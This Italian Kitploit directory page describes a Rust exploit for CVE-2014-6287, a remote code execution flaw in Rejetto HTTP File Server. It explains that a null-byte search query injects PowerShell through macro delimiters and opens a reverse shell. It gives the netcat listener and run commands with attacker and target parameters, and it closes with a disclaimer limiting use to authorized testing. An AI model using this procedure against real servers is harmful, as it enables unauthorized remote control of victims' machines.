Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-6287 — Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c. | Kitploit
Strumenti/GitHubGitHub/nika0x38/cve-2014-6287
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c.

Vedi Repository
11 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2014-6287 - Exploit RCE per Rejetto HTTP File Server

Rust Security

Un'implementazione in Rust dell'exploit CVE-2014-6287 che colpisce Rejetto HTTP File Server (HFS) versioni 2.3x precedenti alla 2.3c.

Panoramica della vulnerabilità

CVE-2014-6287 è una vulnerabilità critica di esecuzione remota di codice in Rejetto HTTP File Server (HFS).

Dettagli tecnici

  • Software interessato: Rejetto HTTP File Server (HFS) 2.3x precedente alla 2.3c
  • Tipo di vulnerabilità: Esecuzione remota di codice (RCE)
  • Punteggio CVSS: 10.0 (Critico)
  • CWE: CWE-94 (Improper Control of Generation of Code)

Descrizione

La funzione findMacroMarker in parserLib.pas in Rejetto HTTP File Server consente ad attaccanti remoti di eseguire programmi arbitrari tramite una sequenza %00 in un'azione di ricerca. Questa vulnerabilità consente agli attaccanti di aggirare la validazione dell'input e iniettare codice malevolo che viene eseguito sul sistema di destinazione.

L'exploit funziona nel seguente modo:

  1. Creando una query di ricerca malevola contenente un byte nullo (%00)
  2. Iniettando comandi PowerShell all'interno dei delimitatori di macro {. e .}
  3. Il server elabora la macro ed esegue il codice PowerShell incorporato
  4. Stabilendo una connessione reverse shell verso l'attaccante

Utilizzo

Passo 1: Configurare un listener Netcat

Prima di eseguire l'exploit, configura un listener sulla tua macchina di attacco per ricevere la reverse shell:

root@kitploit:~
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>

Passo 2: Eseguire l'exploit

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Parametri obbligatori:

  • -l, --lhost <LHOST>: Il tuo indirizzo IP locale (macchina dell'attaccante)
  • -p, --lport <LPORT>: La tua porta locale per la reverse shell
  • -r, --rhost <RHOST>: Indirizzo IP del target (server HFS vulnerabile)

Parametri opzionali:

  • -t, --rport <RPORT>: Porta del target (predefinita: 80)

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e di test di penetrazione autorizzati. Utilizzalo in modo responsabile e solo su sistemi di tua proprietà o per cui hai esplicita autorizzazione a

Scarica lo strumento